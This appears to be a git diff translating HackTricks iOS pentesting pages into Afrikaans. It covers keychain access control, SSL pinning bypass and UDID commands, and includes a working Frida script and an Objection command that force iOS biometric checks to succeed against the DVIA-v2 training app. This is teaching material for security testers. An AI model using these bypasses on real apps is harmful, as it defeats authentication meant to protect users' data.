items with the `SecAccessControl` attribute, which restricts access to the item until the user successfully authenticates via Touch ID or device passcode. This feature is crucial for enhancing security. +Die sleutelbos bied die vermoë om items met die `SecAccessControl`-eienskap in te stel, wat toegang tot die item beperk totdat die gebruiker suksesvol verifieer deur middel van Touch ID of toestel wagwoord. Hierdie funksie is krities vir die verbetering van sekuriteit. -Below are code examples in Swift and Objective-C demonstrating how to save and retrieve a string to/from the keychain, leveraging these security features. The examples specifically show how to set up access control to require Touch ID authentication and ensure the data is accessible only on the device it was set up on, under the condition that a device passcode is configured. +Hieronder is voorbeeldkodes in Swift en Objective-C wat demonstreer hoe om 'n string na die sleutelbos te stoor en te herwin, deur gebruik te maak van hierdie sekuriteitskenmerke. Die voorbeelde wys spesifiek hoe om toegangsbeheer in te stel om Touch ID-verifikasie te vereis en te verseker dat die data slegs toeganklik is op die toestel waarop dit opgestel is, onder die voorwaarde dat 'n toestel wagwoord gekonfigureer is. {% tabs %} {% tab title="Swift" %} @@ -856,12 +804,12 @@ Below are code examples in Swift and Objective-C demonstrating how to save and r var error: Unmanaged? guard let accessControl = SecAccessControlCreateWithFlags(kCFAllocatorDefault, - kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, - SecAccessControlCreateFlags.biometryCurrentSet, - &error) else { - // failed to create AccessControl object +kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, +SecAccessControlCreateFlags.biometryCurrentSet, +&error) else { +// failed to create AccessControl object - return +return } // 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute @@ -879,45 +827,45 @@ query[kSecAttrAccessControl as String] = accessControl let status = SecItemAdd(query as CFDictionary, nil) if status == noErr { - // successfully saved +// successfully saved } else { - // error while saving +// error while saving } ``` {% endtab %} -{% tab title="Objective-C" %} +{% tab title="Objective-C" %}Doel-C ```objectivec - // 1. create AccessControl object that will represent authentication settings - CFErrorRef *err = nil; +// 1. create AccessControl object that will represent authentication settings +CFErrorRef *err = nil; - SecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault, - kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, - kSecAccessControlUserPresence, - err); +SecAccessControlRef sacRef = SecAccessControlCreateWithFlags(kCFAllocatorDefault, +kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly, +kSecAccessControlUserPresence, +err); - // 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute - NSDictionary* query = @{ - (_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, - (__bridge id)kSecAttrLabel: @"com.me.myapp.password", - (__bridge id)kSecAttrAccount: @"OWASP Account", - (__bridge id)kSecValueData: [@"test_strong_password" dataUsingEncoding:NSUTF8StringEncoding], - (__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef - }; +// 2. define keychain services query. Pay attention that kSecAttrAccessControl is mutually exclusive with kSecAttrAccessible attribute +NSDictionary* query = @{ +(_ _bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, +(__bridge id)kSecAttrLabel: @"com.me.myapp.password", +(__bridge id)kSecAttrAccount: @"OWASP Account", +(__bridge id)kSecValueData: [@"test_strong_password" dataUsingEncoding:NSUTF8StringEncoding], +(__bridge id)kSecAttrAccessControl: (__bridge_transfer id)sacRef +}; - // 3. save item - OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil); +// 3. save item +OSStatus status = SecItemAdd((__bridge CFDictionaryRef)query, nil); - if (status == noErr) { - // successfully saved - } else { - // error while saving - } +if (status == noErr) { +// successfully saved +} else { +// error while saving +} ``` {% endtab %} {% endtabs %} -Now we can request the saved item from the keychain. Keychain services will present the authentication dialog to the user and return data or nil depending on whether a suitable fingerprint was provided or not. +Nou kan ons die gestoorde item van die sleutelketting aanvra. Sleutelkettingdienste sal die verifikasievenster aan die gebruiker vertoon en data of nil teruggee, afhangende van of 'n geskikte vingerafdruk voorsien is of nie. {% tabs %} {% tab title="Swift" %} @@ -933,67 +881,62 @@ query[kSecUseOperationPrompt as String] = "Please, pass authorisation to enter t // 2. get item var queryResult: AnyObject? let status = withUnsafeMutablePointer(to: &queryResult) { - SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0)) +SecItemCopyMatching(query as CFDictionary, UnsafeMutablePointer($0)) } if status == noErr { - let password = String(data: queryResult as! Data, encoding: .utf8)! - // successfully received password +let password = String(data: queryResult as! Data, encoding: .utf8)! +// successfully received password } else { - // authorization not passed +// authorization not passed } ``` {% endtab %} -{% tab title="Objective-C" %} +{% tab title="Objective-C" %}Doel-C ```objectivec // 1. define query NSDictionary *query = @{(__bridge id)kSecClass: (__bridge id)kSecClassGenericPassword, - (__bridge id)kSecReturnData: @YES, - (__bridge id)kSecAttrAccount: @"My Name1", - (__bridge id)kSecAttrLabel: @"com.me.myapp.password", - (__bridge id)kSecUseOperationPrompt: @"Please, pass authorisation to enter this area" }; +(__bridge id)kSecReturnData: @YES, +(__bridge id)kSecAttrAccount: @"My Name1", +(__bridge id)kSecAttrLabel: @"com.me.myapp.password", +(__bridge id)kSecUseOperationPrompt: @"Please, pass authorisation to enter this area" }; // 2. get item CFTypeRef queryResult = NULL; OSStatus status = SecItemCopyMatching((__bridge CFDictionaryRef)query, &queryResult); if (status == noErr){ - NSData* resultData = ( __bridge_transfer NSData* )queryResult; - NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding]; - NSLog(@"%@", password); +NSData* resultData = ( __bridge_transfer NSData* )queryResult; +NSString* password = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding]; +NSLog(@"%@", password); } else { - NSLog(@"Something went wrong"); +NSLog(@"Something went wrong"); } ``` {% endtab %} {% endtabs %} -### Detection - -Usage of frameworks in an app can also be detected by analyzing the app binary's list of shared dynamic libraries. This can be done by using `otool`: +### Opmerking +Die gebruik van raamwerke in 'n toepassing kan ook opgespoor word deur die analise van die lys gedeelde dinamiese biblioteke van die toepassingsbinêre. Dit kan gedoen word deur gebruik te maak van `otool`: ```bash $ otool -L .app/ ``` - -If `LocalAuthentication.framework` is used in an app, the output will contain both of the following lines (remember that `LocalAuthentication.framework` uses `Security.framework` under the hood): - +As `LocalAuthentication.framework` in 'n app gebruik word, sal die uitset beide van die volgende lyne bevat (onthou dat `LocalAuthentication.framework` `Security.framework` onder die kap gebruik): ```bash /System/Library/Frameworks/LocalAuthentication.framework/LocalAuthentication /System/Library/Frameworks/Security.framework/Security ``` +As `Security.framework` gebruik word, sal slegs die tweede een vertoon word. -If `Security.framework` is used, only the second one will be shown. - -### Local Authentication Framework Bypass +### Plaaslike Verifikasie Raamwerk Omspring #### **Objection** -Through the **Objection Biometrics Bypass**, located at [this GitHub page](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass), a technique is available for overcoming the **LocalAuthentication** mechanism. The core of this approach involves leveraging **Frida** to manipulate the `evaluatePolicy` function, ensuring it consistently yields a `True` outcome, irrespective of the actual authentication success. This is particularly useful for circumventing flawed biometric authentication processes. - -To activate this bypass, the following command is employed: +Deur middel van die **Objection Biometrie Omspring**, wat op [hierdie GitHub-bladsy](https://github.com/sensepost/objection/wiki/Understanding-the-iOS-Biometrics-Bypass) gevind kan word, is daar 'n tegniek beskikbaar om die **LocalAuthentication** meganisme te omseil. Die kern van hierdie benadering behels die gebruik van **Frida** om die `evaluatePolicy` funksie te manipuleer, sodat dit altyd 'n `True` uitkoms gee, ongeag die werklike verifikasie sukses. Dit is veral nuttig vir die omseil van gebrekkige biometriese verifikasieprosesse. +Om hierdie omspring te aktiveer, word die volgende bevel gebruik: ```bash ...itudehacks.DVIAswiftv2.develop on (iPhone: 13.2.3) [usb] # ios ui biometrics_bypass (agent) Registering job 3mhtws9x47q. Type: ios-biometrics-disable @@ -1002,88 +945,81 @@ To activate this bypass, the following command is employed: (agent) [3mhtws9x47q] Marking OS response as True instead (agent) [3mhtws9x47q] Biometrics bypass hook complete ``` - -This command sets off a sequence where Objection registers a task that effectively alters the outcome of the `evaluatePolicy` check to `True`. +Hierdie bevel stel 'n reeks in waar Objection 'n taak registreer wat die uitkoms van die `evaluatePolicy`-toets effektief verander na `True`. #### Frida -An example of a use of **`evaluatePolicy`** from [DVIA-v2 application](https://github.com/prateek147/DVIA-v2): - +'n Voorbeeld van die gebruik van **`evaluatePolicy`** van die [DVIA-v2-toepassing](https://github.com/prateek147/DVIA-v2): ```swift +(void)authenticateWithTouchID { - LAContext *myContext = [[LAContext alloc] init]; - NSError *authError = nil; - NSString *myLocalizedReasonString = @"Please authenticate yourself"; - - if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) { - [myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics - localizedReason:myLocalizedReasonString - reply:^(BOOL success, NSError *error) { - if (success) { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"]; - }); - } else { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Authentication Failed !" withTitle:@"Error"]; - }); - } - }]; - } else { - dispatch_async(dispatch_get_main_queue(), ^{ - [TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"]; - }); - } +LAContext *myContext = [[LAContext alloc] init]; +NSError *authError = nil; +NSString *myLocalizedReasonString = @"Please authenticate yourself"; + +if ([myContext canEvaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics error:&authError]) { +[myContext evaluatePolicy:LAPolicyDeviceOwnerAuthenticationWithBiometrics +localizedReason:myLocalizedReasonString +reply:^(BOOL success, NSError *error) { +if (success) { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Authentication Successful" withTitle:@"Success"]; +}); +} else { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Authentication Failed !" withTitle:@"Error"]; +}); +} +}]; +} else { +dispatch_async(dispatch_get_main_queue(), ^{ +[TouchIDAuthentication showAlert:@"Your device doesn't support Touch ID or you haven't configured Touch ID authentication on your device" withTitle:@"Error"]; +}); +} } ``` +Om die **omseiling** van Plaaslike Verifikasie te bereik, word 'n Frida-skrips geskryf. Hierdie skrips teiken die **evaluatePolicy**-kontrole en onderskep sy terugroep om te verseker dat dit altyd **success=1** teruggee. Deur die gedrag van die terugroep te verander, word die verifikasie-kontrole effektief omseil. -To achieve the **bypass** of Local Authentication, a Frida script is written. This script targets the **evaluatePolicy** check, intercepting its callback to ensure it returns **success=1**. By altering the callback's behavior, the authentication check is effectively bypassed. - -The script below is injected to modify the result of the **evaluatePolicy** method. It changes the callback's result to always indicate success. - +Die onderstaande skrips word ingesluit om die resultaat van die **evaluatePolicy**-metode te wysig. Dit verander die resultaat van die terugroep om altyd sukses aan te dui. ```swift // from https://securitycafe.ro/2022/09/05/mobile-pentesting-101-bypassing-biometric-authentication/ if(ObjC.available) { - console.log("Injecting..."); - var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"]; - Interceptor.attach(hook.implementation, { - onEnter: function(args) { - var block = new ObjC.Block(args[4]); - const callback = block.implementation; - block.implementation = function (error, value) { - - console.log("Changing the result value to true") - const result = callback(1, null); - return result; - }; - }, - }); +console.log("Injecting..."); +var hook = ObjC.classes.LAContext["- evaluatePolicy:localizedReason:reply:"]; +Interceptor.attach(hook.implementation, { +onEnter: function(args) { +var block = new ObjC.Block(args[4]); +const callback = block.implementation; +block.implementation = function (error, value) { + +console.log("Changing the result value to true") +const result = callback(1, null); +return result; +}; +}, +}); } else { - console.log("Objective-C Runtime is not available!"); +console.log("Objective-C Runtime is not available!"); } ``` - -To inject the Frida script and bypass the biometric authentication, the following command is used: - +Om die Frida-skrip in te spuit en die biometriese verifikasie te omseil, word die volgende bevel gebruik: ```bash frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-ios.js ``` +## Sensitiewe Funksionaliteit Blootstelling deur IPC -## Sensitive Functionality Exposure Through IPC - -### Custom URI Handlers / Deeplinks / Custom Schemes +### Aangepaste URI Handlers / Deeplinks / Aangepaste Skemas {% content-ref url="ios-custom-uri-handlers-deeplinks-custom-schemes.md" %} [ios-custom-uri-handlers-deeplinks-custom-schemes.md](ios-custom-uri-handlers-deeplinks-custom-schemes.md) {% endcontent-ref %} -### Universal Links +### Universele Skakels {% content-ref url="ios-universal-links.md" %} [ios-universal-links.md](ios-universal-links.md) {% endcontent-ref %} -### UIActivity Sharing +### UIActivity Deling {% content-ref url="ios-uiactivity-sharing.md" %} [ios-uiactivity-sharing.md](ios-uiactivity-sharing.md) @@ -1095,7 +1031,7 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i [ios-uipasteboard.md](ios-uipasteboard.md) {% endcontent-ref %} -### App Extensions +### App Uitbreidings {% content-ref url="ios-app-extensions.md" %} [ios-app-extensions.md](ios-app-extensions.md) @@ -1107,65 +1043,63 @@ frida -U -f com.highaltitudehacks.DVIAswiftv2 --no-pause -l fingerprint-bypass-i [ios-webviews.md](ios-webviews.md) {% endcontent-ref %} -### Serialisation and Encoding +### Serialisering en Enkodering {% content-ref url="ios-serialisation-and-encoding.md" %} [ios-serialisation-and-encoding.md](ios-serialisation-and-encoding.md) {% endcontent-ref %} -## Network Communication +## Netwerk Kommunikasie -It's important to check that no communication is occurring **without encryption** and also that the application is correctly **validating the TLS certificate** of the server.\ -To check these kind of issues you can use a proxy like **Burp**: +Dit is belangrik om te kontroleer dat geen kommunikasie plaasvind **sonder versleuteling** en dat die toepassing die TLS-sertifikaat van die bediener korrek **valideer**.\ +Om hierdie soort probleme te ondersoek, kan jy 'n proksi soos **Burp** gebruik: {% content-ref url="burp-configuration-for-ios.md" %} [burp-configuration-for-ios.md](burp-configuration-for-ios.md) {% endcontent-ref %} -### Hostname check +### Naam van bediener kontroleer -One common issue validating the TLS certificate is to check that the certificate was signed by a **trusted** **CA**, but **not check** if **the hostname** of the certificate is the hostname being accessed.\ -In order to check this issue using Burp, after trusting Burp CA in the iPhone, you can **create a new certificate with Burp for a different hostname** and use it. If the application still works, then, something it's vulnerable. +Een algemene probleem met die validering van die TLS-sertifikaat is om te kontroleer of die sertifikaat deur 'n **vertroude** **CA** onderteken is, maar **nie kontroleer** of **die naam van die bediener** van die sertifikaat die naam van die bediener is wat benader word nie.\ +Om hierdie probleem te ondersoek met behulp van Burp, nadat jy die Burp CA op die iPhone vertrou, kan jy **'n nuwe sertifikaat met Burp vir 'n ander naam van die bediener** skep en dit gebruik. As die toepassing steeds werk, is iets kwesbaar. -### Certificate Pinning +### Sertifikaat Pinning -If an application is correctly using SSL Pinning, then the application will only works if the certificate is the once expected to be. When testing an application **this might be a problem as Burp will serve it's own certificate.**\ -In order to bypass this protection inside a jailbroken device, you can install the application [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) or install [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) +As 'n toepassing SSL Pinning korrek gebruik, sal die toepassing slegs werk as die sertifikaat die verwagte een is. Wanneer jy 'n toepassing toets, **kan dit 'n probleem wees omdat Burp sy eie sertifikaat sal gebruik.**\ +Om hierdie beskerming binne 'n jailbroken-toestel te omseil, kan jy die toepassing [**SSL Kill Switch**](https://github.com/nabla-c0d3/ssl-kill-switch2) installeer of [**Burp Mobile Assistant**](https://portswigger.net/burp/documentation/desktop/mobile/config-ios-device) installeer. -You can also use **objection's** `ios sslpinning disable` +Jy kan ook **objection's** `ios sslpinning disable` gebruik -## Misc +## Verskillende -* In **`/System/Library`** you can find the frameworks installed in the phone used by system applications -* The applications installed by the user from the App Store are located inside **`/User/Applications`** -* And the **`/User/Library`** contains data saved by the user level applications -* You can access **`/User/Library/Notes/notes.sqlite`** to read the notes saved inside the application. -* Inside the folder of an installed application (**`/User/Applications//`**) you can find some interesting files: - * **`iTunesArtwork`**: The icon used by the app - * **`iTunesMetadata.plist`**: Info of the app used in the App Store - * **`/Library/*`**: Contains the preferences and cache. In **`/Library/Cache/Snapshots/*`** you can find the snapshot performed to the application before sending it to the background. +* In **`/System/Library`** kan jy die raamwerke wat in die foon geïnstalleer is en deur stelseltoepassings gebruik word, vind. +* Die toepassings wat deur die gebruiker van die App Store geïnstalleer is, is geleë binne **`/User/Applications`** +* En die **`/User/Library`** bevat data wat deur gebruikersvlaktoepassings gestoor is. +* Jy kan toegang verkry tot **`/User/Library/Notes/notes.sqlite`** om die notas wat binne die toepassing gestoor is, te lees. +* Binne die vouer van 'n geïnstalleerde toepassing (**`/User/Applications//`**) kan jy 'n paar interessante lêers vind: +* **`iTunesArtwork`**: Die ikoon wat deur die app gebruik word +* **`iTunesMetadata.plist`**: Inligting van die app wat in die App Store gebruik word +* **`/Library/*`**: Bevat die voorkeure en cache. In **`/Library/Cache/Snapshots/*`** kan jy die oorsig vind wat van die toepassing geneem is voordat dit na die agtergrond gestuur is. -### Hot Patching/Enforced Updateing +### Warm Patching/Verpligte Opdatering -The developers can remotely **patch all installations of their app instantly** without having to resubmit the application to the App store and wait until it's approved.\ -For this purpose it's usually use [**JSPatch**](https://github.com/bang590/JSPatch)**.** But there are other options also such as [Siren](https://github.com/ArtSabintsev/Siren) and [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\ -**This is a dangerous mechanism that could be abused by malicious third party SDKs therefore it's recommended to check which method is used to automatic updating (if any) and test it.** You could try to download a previous version of the app for this purpose. +Die ontwikkelaars kan alle installasies van hul toepassing **onmiddellik herstel** sonder om die toepassing na die App Store te stuur en te wag tot dit goedgekeur word.\ +Hiervoor word gewoonlik [**JSPatch**](https://github.com/bang590/JSPatch)** gebruik.** Maar daar is ook ander opsies soos [Siren](https://github.com/ArtSabintsev/Siren) en [react-native-appstore-version-checker](https://www.npmjs.com/package/react-native-appstore-version-checker).\ +**Dit is 'n gevaarlike meganisme wat misbruik kan word deur kwaadwillige derde party SDK's, daarom word dit aanbeveel om te ondersoek watter metode gebruik word vir outomatiese opdatering (indien enige) en dit te toets.** Jy kan probeer om 'n vorige weergawe van die toepassing af te laai vir hierdie doel. -### Third Parties +### Derde Party -A significant challenge with **3rd party SDKs** is the **lack of granular control** over their functionalities. Developers are faced with a choice: either integrate the SDK and accept all its features, including potential security vulnerabilities and privacy concerns, or forego its benefits entirely. Often, developers are unable to patch vulnerabilities within these SDKs themselves. Furthermore, as SDKs gain trust within the community, some may start to contain malware. +'n Belangrike uitdaging met **3de party SDK's** is die **gebrek aan fynkontrole** oor hul funksionaliteite. Ontwikkelaars staan voor 'n keuse: óf die SDK integreer en al sy funksies aanvaar, insluitende potensiële sekuriteitskwessies en privaatheidskwessies, óf die voordele daarvan heeltemal verwerp. Ontwikkelaars is dikwels nie in staat om kwessies binne hierdie SDK's self te herstel nie. Verder, soos SDK's vertroue in die gemeenskap verwerf, mag sommige malware bevat. -The services provided by third-party SDKs may include user behavior tracking, advertisement displays, or user experience enhancements. However, this introduces a risk as developers may not be fully aware of the code executed by these libraries, leading to potential privacy and security risks. It's crucial to limit the information shared with third-party services to what is necessary and ensure that no sensitive data is exposed. +Die dienste wat deur derde party SDK's verskaf word, kan gebruikersgedragopsporing, advertensie-uitstallings of gebruikerservaringsverbeterings insluit. Dit bring egter 'n risiko mee, aangesien ontwikkelaars nie ten volle bewus is van die kode wat deur hierdie biblioteke uitgevoer word nie, wat moontlike privaatheids- en sekuriteitsrisiko's tot gevolg kan hê. Dit is noodsaaklik om die inligting wat met derde party dienste gedeel word, te beperk tot wat nodig is en te verseker dat geen sensitiewe data blootgestel word nie. -Implementation of third-party services usually comes in two forms: a standalone library or a full SDK. To protect user privacy, any data shared with these services should be **anonymized** to prevent the disclosure of Personal Identifiable Information (PII). - -To identify the libraries an application uses, the **`otool`** command can be employed. This tool should be run against the application and each shared library it uses to discover additional libraries. +Implementering van derde party dienste kom gewoonlik in twee vorme voor: 'n afsonderlike biblioteek of 'n volledige SDK. Om gebruikersprivaatheid te beskerm, moet enige data wat met hierdie dienste gedeel word, **geanonimiseer** word om die bekendmaking van Persoonlik Identifiseerbare Inligting (PII) te voorkom. +Om die biblioteke wat 'n toepassing gebruik, te identifiseer, kan die **`otool`**-opdrag gebruik word. Hierdie hulpmiddel moet teen die toepassing en elke gedeelde biblioteek wat dit gebruik, uitgevoer word om addisionele biblioteke te ontdek. ```bash otool -L ``` - -## **References & More Resources** +## **Verwysings & Meer Hulpbronne** * [https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing#information-gathering](https://mobile-security.gitbook.io/mobile-security-testing-guide/ios-testing-guide/0x06b-basic-security-testing#information-gathering) * [iOS & Mobile App Pentesting - INE](https://my.ine.com/CyberSecurity/courses/089d060b/ios-mobile-app-pentesting) @@ -1183,34 +1117,34 @@ otool -L * [https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064](https://mas.owasp.org/MASTG/tests/ios/MASVS-AUTH/MASTG-TEST-0064) * [https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc](https://medium.com/securing/bypassing-your-apps-biometric-checks-on-ios-c2555c81a2dc) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054](https://mas.owasp.org/MASTG/tests/ios/MASVS-STORAGE/MASTG-TEST-0054) -* [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS free course([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)) +* [https://github.com/ivRodriguezCA/RE-iOS-Apps/](https://github.com/ivRodriguezCA/RE-iOS-Apps/) IOS gratis kursus([https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/](https://syrion.me/blog/ios-swift-antijailbreak-bypass-frida/)) * [https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577](https://www.sans.org/reading-room/whitepapers/testing/ipwn-apps-pentesting-ios-applications-34577) * [https://www.slideshare.net/RyanISI/ios-appsecurityminicourse](https://www.slideshare.net/RyanISI/ios-appsecurityminicourse) * [https://github.com/prateek147/DVIA](https://github.com/prateek147/DVIA) * [https://github.com/prateek147/DVIA-v2](https://github.com/prateek147/DVIA-v2) * [https://github.com/OWASP/MSTG-Hacking-Playground%20](https://github.com/OWASP/MSTG-Hacking-Playground) -* OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C version [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift version +* OWASP iGoat [_https://github.com/OWASP/igoat_](https://github.com/OWASP/igoat) <<< Objective-C weergawe [_https://github.com/OWASP/iGoat-Swift_](https://github.com/OWASP/iGoat-Swift) <<< Swift weergawe * [https://github.com/authenticationfailure/WheresMyBrowser.iOS](https://github.com/authenticationfailure/WheresMyBrowser.iOS) * [https://github.com/nabla-c0d3/ssl-kill-switch2](https://github.com/nabla-c0d3/ssl-kill-switch2)
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik **werkstrome** te bou en outomatiseer met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md index 1bc897e64..c26241378 100644 --- a/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -1,203 +1,177 @@ -# iOS Basic Testing Operations +# iOS Basiese Toetsoperasies
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien jou **maatskappy geadverteer in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Summary of iOS Device Identification and Access** +## **Opsomming van iOS-toestelidentifikasie en toegang** -### **Identifying the UDID of an iOS Device** +### **Identifisering van die UDID van 'n iOS-toestel** -To identify an iOS device uniquely, a 40-digit sequence known as the UDID is used. On macOS Catalina or newer, this can be found in the **Finder app**, as iTunes is no longer present. The device, once connected via USB and selected in Finder, reveals its UDID among other information when the details under its name are clicked through. +Om 'n iOS-toestel uniek te identifiseer, word 'n 40-syfer-reeks bekend as die UDID gebruik. Op macOS Catalina of nuwer kan dit in die **Finder-app** gevind word, aangesien iTunes nie meer teenwoordig is nie. Die toestel, sodra dit via USB gekoppel is en in Finder gekies is, openbaar sy UDID saam met ander inligting wanneer die besonderhede onder sy naam deurgeklik word. -For versions of macOS prior to Catalina, iTunes facilitates the discovery of the UDID. Detailed instructions can be found [here](http://www.iclarified.com/52179/how-to-find-your-iphones-udid). +Vir weergawes van macOS vóór Catalina fasiliteer iTunes die ontdekking van die UDID. Gedetailleerde instruksies kan hier gevind word [hier](http://www.iclarified.com/52179/how-to-find-your-iphones-udid). -Command-line tools offer alternative methods for retrieving the UDID: - -* **Using I/O Registry Explorer tool `ioreg`:** +Opdraggereelhulpmiddels bied alternatiewe metodes vir die ophaling van die UDID: +* **Met behulp van die I/O Registry Explorer-hulpmiddel `ioreg`:** ```bash $ ioreg -p IOUSB -l | grep "USB Serial" ``` - -* **Using `ideviceinstaller` for macOS (and Linux):** - +* **Gebruik van `ideviceinstaller` vir macOS (en Linux):** ```bash $ brew install ideviceinstaller $ idevice_id -l ``` - -* **Utilizing `system_profiler`:** - +* **Gebruik van `system_profiler`:** ```bash $ system_profiler SPUSBDataType | sed -n -e '/iPad/,/Serial/p;/iPhone/,/Serial/p;/iPod/,/Serial/p' | grep "Serial Number:" ``` - -* **Employing `instruments` to list devices:** - +* **Gebruik van `instruments` om toestelle te lys:** ```bash $ instruments -s devices ``` +### **Toegang tot die toestel se skulp** -### **Accessing the Device Shell** +**SSH-toegang** word 